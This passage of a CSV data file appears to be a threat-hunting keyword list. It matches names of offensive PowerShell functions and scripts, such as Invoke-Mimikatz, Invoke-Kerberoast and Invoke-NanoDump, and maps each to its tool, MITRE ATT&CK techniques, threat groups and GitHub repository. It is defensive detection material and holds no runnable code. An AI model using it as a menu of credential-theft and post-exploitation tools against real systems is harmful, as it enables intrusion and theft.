- T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Invoke-Kerberoast*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Kerberoast*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Kerberoast*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*Invoke-Kerberoast.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*Invoke-Keylogger.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-KrbRelay*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-LapsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-LapsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-LdapSignCheck*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-LdapSignCheck*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-LocalAdminGroupCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-LocalAdminGroupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Lockless*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Locksmith.ps1*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","473","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" +"*Invoke-LoginPrompt.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Invoke-LsaProtectionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-LsaProtectionsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-MachineRoleCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-MalSCCM*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-MalSCCM*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-MapDomainTrust*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Merlin.ps1*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*Invoke-MetaTwin*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" +"*InvokeMeter.bat*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*Invoke-MFASweep*","offensive_tool_keyword","FMFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1033","152","2023-07-25T05:10:55Z","2020-09-22T16:25:03Z" +"*Invoke-Mimikatz*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Mimikatz*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","24","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" +"*Invoke-Mimikatz*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Mimikatz.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-Mimikatz.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*Invoke-Mimikatz.ps1*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","24","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" +"*Invoke-Mimikatz-old*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*Invoke-MITM6*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-ModifiableProgramsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-MonitorCredSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-MS16*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-MS16032*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16032.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-MS16032*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1126","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-MS16135*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-MS16135.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1120","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-NamedPipePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-NanoDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-NanoDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-NetRipper*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1069","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-NetworkAdaptersCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-NetworkRelay*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-Nightmare -DLL *","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-Nightmare -NewUser*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks 